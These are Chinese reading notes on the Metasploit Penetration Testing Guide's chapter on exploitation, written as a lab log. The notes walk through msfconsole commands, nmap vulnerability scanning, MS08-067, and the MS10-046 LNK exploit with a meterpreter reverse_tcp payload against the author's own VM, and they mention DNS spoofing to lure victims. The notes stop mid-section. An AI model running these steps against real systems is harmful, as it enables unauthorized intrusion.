Metasploit渗透测试指南读书笔记第五章.doc

唐僧笔记 Metasploit渗透测试指南读书笔记第五章 取经之路技术交流群：161810021第5章 渗透攻击之旅5.1渗透攻击基础5.1.1 msf show exploits 这个命令会显示Metasploit框架中所有可有的渗透攻击模块。5.1.2 msf show auxiliary 这个命令会显示所有的辅助模块以及它们的用途。在Metasploit中，辅助模块的用途非常广泛，它们可以是扫描器，拒绝服务攻击工具，fuzz测试器，以及其他类型的工具。5.1.3 msf show options 参数（options）是保证Metasploit框架中各个模块正确运行所需要的的各种设置。当你选择了一个模块，并输入show options后，会列出各种参数，没选择模块它会列出所有的全局参数输入back返回到上一个状态搜索（search），当你不知道模块路径时它就起作用了。5.14 msf show payloads 查看所有的活动状态的攻击载荷这里我们选择 payload windows/shell/reverse_tcpReverse_tcp(反弹式tcp连接）5.15 msf show targets 列出漏洞影响目标系统的类型。 注：0是自动攻击5.1.6 info 使用info命令加上模块的名字来显示此模块的详细信息，参数说明以及所有可用的目标系统。（这没什么用，不多介绍了）5.1.7 set和unset 模块中参数只有两个状态：已设置（set）或者未设置（unset）。有些参数被标记为必填项（required）这样的参数必须经过手工设置并处于启用状态。 使用show options命令可用查看那些参数是必填。 使用set命令可以对某个参数进行设置（同时启用改参数） 使用unset命令可以禁用相关参数。5.1.8 setg和unsetg 这两个命令能够对全局参数进行设置或清除。5.1.9 save 在使用setg命令对全局参数进行设置后，可以使用save命令将当前的设置保存下来5.2 你的第一次渗透攻击第一步扫描，呵呵！这里全部按照书上来会失败的，看吧！Traceroute does not support idle or connect scan不支持连接扫描，但书上确实是这样扫描出来的。那怎么办了？是不是就放弃了，呵呵！不。这里我们不要进入msf这个框架扫描，直接在外面扫。看见最下面一行么，likely 呵呵！ MS08-067: VULNERABLE这说明存在这个漏洞下面我们来了解一下那个nmap的参数吧！-sT 是指隐秘的TCP连接扫描（Stealth TCP connect）-sS 隐秘的TCP Syn扫描-A 是指高级的操作系统探测功能（advance OS detection）-POprotocol list: IP Protocol Ping 列出开放的端口-script=smb-check-vulns 调用nmap的插件既然有漏洞，那我们就来尝试下，看看能不能拿下这台主机吧！ 呵呵！知道这是为什么吗？这个刚刚我们保存的（5.1.9时save）那我们就简单，设置一下参数吧！这是参数的设置。 这里应该会不成功，因为我的虚拟机安装的是GHost的系统，它自带了一些补丁，08年的洞，这个补丁应该打上了。如我预料，看最后一行，不能创建会话，是吧！这里我拿另外一个漏洞吧！Ms10-046（Microsoft Windows Shell LNK Code Execution），这个可以我试过，呵呵！不记得了找一下吧!出来了。msf use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 选择攻击模块set PAYLOAD windows/meterpreter/reverse_tcp攻击载荷，这里选择反弹式tcp连接 设置参数，运行攻击。这个时候只要是有主机打开0:80/ 这个地址就有可能挂了。看吧！打开浏览器输入网址就成了这样了，这说明成功。我打开了两下，所有有两个会话。 看见了吧！这个主机挂了。注：sessions -i 会话的id 这样就进去了。 有的我就没多写了，你们可以打问号就知道参数的意思了。 你可能会问，别人为什么要打开这个Url地址了，不打开不就没事么！是的，不打开这个网址是没没事。但有一点你一定会打开网站，这点毋庸置疑是吧！只要你打开网站你就挂了，这里就涉及到了dns欺骗。Dns欺骗请看这里，我这就不多说了。/%D5%F1%CF%A3/blog/item/ae7a88437be09a2bafc3ab3c.html5.3 攻击一台Ubuntu主机 这里我就简单的说下，由于我的Ubuntu9.04这个ios文件不知道怎么回事，用不了。所以这个实验就不能做了，不过也不要紧。这个也很简单就是利用一个samba漏洞.5.4 全端口攻击载荷：暴力猜解目标开放的端口 Metasploit会对所有可能的端口进行尝试，直到他发现其中一个是放行的，不过这么多端口可能要耗费点时间。这里不知道我没看懂还是怎么回事，感觉没什么啊！书上就是说 LPORT 这个参数没有设置，默认就是1，指所有的端口5.5资源文件 资源文件（resource files）